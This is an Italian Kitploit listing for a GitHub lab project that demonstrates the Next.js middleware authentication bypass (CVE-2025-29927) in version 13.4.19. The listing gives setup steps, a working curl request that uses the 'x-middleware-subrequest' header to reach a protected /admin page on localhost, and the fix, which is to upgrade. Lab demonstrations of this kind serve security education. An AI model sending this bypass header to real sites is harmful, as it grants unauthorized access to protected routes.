Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
NextJS_CVE-2025-29927 | Kitploit
Strumenti/GitHubGitHub/all3njk/nextjs_cve-2025-29927
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHuball3njk/nextjs_cve-2025-29927

NextJS_CVE-2025-29927

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Dimostrazione di Bypass dell'Autenticazione in Next.js

Questa applicazione dimostra la vulnerabilità x-middleware-subrequest in Next.js 13.4.19, che consente di aggirare la protezione del middleware.

Setup

  1. Installare le dipendenze:
root@kitploit:~
npm install
  1. Avviare il server di sviluppo:
root@kitploit:~
npm run dev

Dimostrazione della Vulnerabilità

L'applicazione ha una pagina admin su /admin che dovrebbe essere protetta dal middleware. Tuttavia, può essere acceduta senza autenticazione utilizzando l'header x-middleware-subrequest.

Flusso Normale

  1. Visita /admin - Verrai reindirizzato a /login
  2. Accedi con qualsiasi credenziale - Verrai reindirizzato a /admin

Metodo di Bypass

Per aggirare l'autenticazione, puoi usare curl o qualsiasi client HTTP per effettuare una richiesta con l'header x-middleware-subrequest:

root@kitploit:~
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin

Implicazioni per la Sicurezza

Questa vulnerabilità dimostra come la protezione del middleware possa essere aggirata in Next.js 13.4.19 utilizzando l'header x-middleware-subrequest. In un ambiente di produzione, questo potrebbe consentire accessi non autorizzati a route protette.

Fix

Per correggere questa vulnerabilità, aggiorna a una versione più recente di Next.js in cui questo problema è stato risolto.

Scarica lo strumento